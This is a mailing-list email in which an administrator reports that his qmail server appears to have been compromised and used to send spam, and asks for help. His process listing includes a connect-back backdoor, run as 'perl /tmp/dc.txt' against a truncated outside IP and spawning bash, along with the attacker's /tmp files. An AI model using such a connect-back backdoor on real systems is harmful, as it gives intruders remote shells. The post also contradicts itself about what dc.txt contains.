*warning long email*
Hi all,
We have been running a Shupp toaster for about 18 months on a Redhat 9
box, and the other day it appears it was compromised by spammers. I
thought if I posted a few things I found about the system drive perhaps
someone might be able to help me figure out how/how to prevent this...
My server is a Sempron 2800+ / 1GB RAM running Redhat 9 and toaster
version .61 (not the latest I know, but I haven't been able to update it
that often)
I say "compromised" because I came in in the morning and found
40-something thousand mails in the queue. We never see more than a few
hundred. It had filled up the disk, and I noticed that they were all
mails to hotmail/yahoo/etc addresses. Bad news.
So I started looking around, I started to suspect that this was some
sort of apache / php exploit, and I noticed the following output of a ps
-ef f:
[EMAIL PROTECTED] ps -ef f
UID PID PPID C STIME TTY STAT TIME CMD
<snip>
root 3761 1 0 Jan19 ? S 0:00 /bin/sh
/command/svscanboot
root 3768 3761 0 Jan19 ? S 0:49 \_ svscan /service
root 3770 3768 0 Jan19 ? S 0:00 | \_ supervise
qmail-send
qmails 3792 3770 0 Jan19 ? S 3:13 | | \_ qmail-send
root 3795 3792 0 Jan19 ? S 0:05 | | \_
qmail-lspawn
qmailr 3796 3792 0 Jan19 ? S 0:20 | | \_
qmail-rspawn
qmailr 5716 3796 0 13:16 ? S 0:00 | | | \_
qmail-rem
qmailr 5719 3796 0 13:16 ? S 0:00 | | | \_
qmail-rem
qmailr 5735 3796 0 13:16 ? S 0:00 | | | \_
qmail-rem
qmailr 5757 3796 0 13:16 ? S 0:00 | | | \_
qmail-rem
qmailr 5910 3796 0 13:17 ? S 0:00 | | | \_
qmail-rem
qmailr 5951 3796 0 13:17 ? S 0:00 | | | \_
qmail-rem
qmailr 6149 3796 0 13:18 ? S 0:00 | | | \_
qmail-rem
qmailr 6233 3796 0 13:18 ? S 0:00 | | | \_
qmail-rem
qmailr 6299 3796 0 13:18 ? S 0:00 | | | \_
qmail-rem
qmailr 6388 3796 0 13:19 ? S 0:00 | | | \_
qmail-rem
qmailr 6430 3796 0 13:19 ? S 0:00 | | | \_
qmail-rem
qmailr 6560 3796 0 13:19 ? S 0:00 | | | \_
qmail-rem
qmailr 6715 3796 0 13:20 ? S 0:00 | | | \_
qmail-rem
qmailr 6846 3796 0 13:20 ? S 0:00 | | | \_
qmail-rem
qmailr 6852 3796 0 13:20 ? S 0:00 | | | \_
qmail-rem
qmailr 7133 3796 0 13:21 ? S 0:00 | | | \_
qmail-rem
qmailr 7541 3796 0 13:23 ? S 0:00 | | | \_
qmail-rem
qmailr 7563 3796 0 13:23 ? S 0:00 | | | \_
qmail-rem
qmailr 7600 3796 0 13:23 ? S 0:00 | | | \_
qmail-rem
qmailr 7614 3796 0 13:23 ? S 0:00 | | | \_
qmail-rem
qmailr 7625 3796 0 13:23 ? S 0:00 | | | \_
qmail-rem
qmailr 8169 3796 0 13:25 ? S 0:00 | | | \_
qmail-rem
qmailr 8319 3796 0 13:26 ? S 0:00 | | | \_
qmail-rem
qmailr 8446 3796 0 13:26 ? S 0:00 | | | \_
qmail-rem
qmailr 8569 3796 0 13:27 ? S 0:00 | | | \_
qmail-rem
qmailr 8681 3796 0 13:27 ? S 0:00 | | | \_
qmail-rem
qmailr 9214 3796 0 13:27 ? S 0:00 | | | \_
qmail-rem
qmailr 10366 3796 0 13:28 ? S 0:00 | | | \_
qmail-rem
qmailr 10564 3796 0 13:29 ? S 0:00 | | | \_
qmail-rem
qmailr 10760 3796 0 13:29 ? S 0:00 | | | \_
qmail-rem
qmailr 10871 3796 0 13:29 ? S 0:00 | | | \_
qmail-rem
qmailr 11544 3796 0 13:30 ? S 0:00 | | | \_
qmail-rem
qmailr 11731 3796 0 13:31 ? S 0:00 | | | \_
qmail-rem
qmailr 12238 3796 0 13:31 ? S 0:00 | | | \_
qmail-rem
qmailr 12402 3796 0 13:31 ? S 0:00 | | | \_
qmail-rem
qmailr 13074 3796 0 13:32 ? S 0:00 | | | \_
qmail-rem
qmailr 13280 3796 0 13:32 ? S 0:00 | | | \_
qmail-rem
qmailr 14385 3796 0 13:34 ? S 0:00 | | | \_
qmail-rem
qmailr 14413 3796 0 13:34 ? S 0:00 | | | \_
qmail-rem
qmailr 14576 3796 0 13:34 ? S 0:00 | | | \_
qmail-rem
qmailr 15075 3796 0 13:35 ? S 0:00 | | | \_
qmail-rem
qmailr 15081 3796 0 13:35 ? S 0:00 | | | \_
qmail-rem
qmailr 15705 3796 0 13:35 ? S 0:00 | | | \_
qmail-rem
qmailr 15933 3796 0 13:35 ? S 0:00 | | | \_
qmail-rem
qmailr 16455 3796 0 13:36 ? S 0:00 | | | \_
qmail-rem
qmailr 16458 3796 0 13:36 ? S 0:00 | | | \_
qmail-rem
qmailr 16561 3796 0 13:36 ? S 0:00 | | | \_
qmail-rem
qmailr 16598 3796 0 13:36 ? S 0:00 | | | \_
qmail-rem
qmailr 16603 3796 0 13:36 ? S 0:00 | | | \_
qmail-rem
qmailr 16605 3796 0 13:36 ? S 0:00 | | | \_
qmail-rem
qmailq 3797 3792 0 Jan19 ? S 1:32 | | \_
qmail-clean
root 3771 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3778 3771 0 Jan19 ? S 0:51 | | \_
/usr/local/bin/mu
root 3772 3768 0 Jan19 ? S 0:00 | \_ supervise
qmail-smtpd
vpopmail 3779 3772 0 Jan19 ? S 0:03 | | \_
/usr/local/bin/tc
root 3773 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3789 3773 0 Jan19 ? S 0:02 | | \_
/usr/local/bin/mu
root 3774 3768 0 Jan19 ? S 0:00 | \_ supervise
qmail-pop3d
vpopmail 3783 3774 0 Jan19 ? S 1:04 | | \_
/usr/local/bin/tc
vpopmail 16612 3783 0 13:36 ? S 0:00 | | \_
/var/qmail/bi
vpopmail 16613 16612 0 13:36 ? S 0:00 | | | \_
/var/qmai
vpopmail 16615 3783 0 13:36 ? R 0:00 | | \_
/var/qmail/bi
root 3775 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3793 3775 0 Jan19 ? S 0:37 | | \_ multilog
t /var/l
root 3776 3768 0 Jan19 ? S 0:00 | \_ supervise
qmail-pop3d
vpopmail 3787 3776 0 Jan19 ? S 0:00 | | \_
/usr/local/bin/tc
root 3777 3768 0 Jan19 ? S 0:00 | \_ supervise log
qmaill 3788 3777 0 Jan19 ? S 0:00 | \_ multilog
t /var/l
root 3769 3761 0 Jan19 ? S 0:00 \_ readproctitle
service err
root 7459 1 0 Jan24 ? S 0:00 /usr/sbin/vsftpd
/etc/vsftpd/
named 15414 1 0 Feb01 ? S 1:33 /usr/sbin/named -u named
root 32229 1 0 Feb02 ? S 0:00 xinetd -stayalive
-pidfile /v
***
apache 29767 1 95 Feb08 ? R 1748:36 /usr/sbin/httpd
apache 32498 1 0 Feb08 ? S 0:00 sh -c perl
/tmp/dc.txt 67.159
apache 32499 32498 0 Feb08 ? S 0:00 \_ perl /tmp/dc.txt
67.159.2
apache 32503 32499 0 Feb08 ? S 0:00 \_ /bin/bash
***
root 5423 1 0 09:36 ? S 0:00
/usr/local/squid/sbin/squid
squid 5425 5423 0 09:36 ? S 0:20 \_ (squid)
squid 5429 5425 0 09:37 ? S 0:00 \_ (unlinkd)
root 5433 1 0 09:37 ? S 0:01 /www/bin/httpd -DSSL
apache 5434 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5435 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5436 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5437 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5438 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5439 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5545 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5549 5433 0 09:37 ? S 0:03 \_ /www/bin/httpd -DSSL
apache 5550 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
apache 5554 5433 0 09:37 ? S 0:02 \_ /www/bin/httpd -DSSL
What caught my attention were the processes I've highlighted with the
***'s. The contents of my /tmp folder were:
[EMAIL PROTECTED] /]# ls -al /tmp/
total 2428
drwxrwxrwt 49 root root 12288 Feb 10 23:15 .
drwxr-xr-x 31 root root 4096 Feb 10 17:47 ..
-rw-r--r-- 1 apache apache 2010487 Dec 30 14:29 7.txt
-rw-r--r-- 1 apache apache 3300 Feb 8 11:53 carteiro.html
-rw-r--r-- 1 apache apache 2126 Feb 8 12:07 dc.txt
-rw-r--r-- 1 apache apache 832 Dec 19 16:15 enviar.pl
srwx------ 1 root nobody 0 Feb 9 14:33 .fam_socket
drwxrwxrwt 2 xfs xfs 4096 Jan 19 05:18 .font-unix
-rw-r--r-- 1 apache apache 0 Feb 8 08:08 .iloveyou
-rw-r--r-- 1 apache apache 127 Feb 8 08:08 .ironmaiden
-rw-r--r-- 1 apache apache 130 Feb 8 08:08 .ironmaiden2
-rw-r--r-- 1 apache apache 231623 Jan 13 15:22 lista-10.txt
I've heard of M$ viruses like "iloveyou" but I didn't think these could
harm a linux box. But these files were in my tmp directory... and the
contents of that perl script contained lines like "--== ConnectBack
Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--"
I'm not sure if I should post the whole script; if someone would like a
copy I can e-mail it, or if an operator thinks it fine I will...
That dc.txt was a looong list of e-mail addresses. As is lista-10.txt.
Granted I'm not a very experienced linux user (PC's for 10 or so years,
Linux for only a few), but I have been following security bulletins and
best practice everywhere, changing root passwords, no shell accounts
etc. and I didn't think my system was too insecure. On a bright side, it
was a good little "stress test" to see the system hold up under 40,000+
e-mails on our connection. On a down side, potential recipients of such
an e-mail attack are not going to see things that way....
Any help anybody can provide in diagnosing this intrusion and/or
preventing it would be greatly appreciated. I will hold off on any more
detail to try to keep this e-mail under the length of an encyclopaedia.
Regards,
David
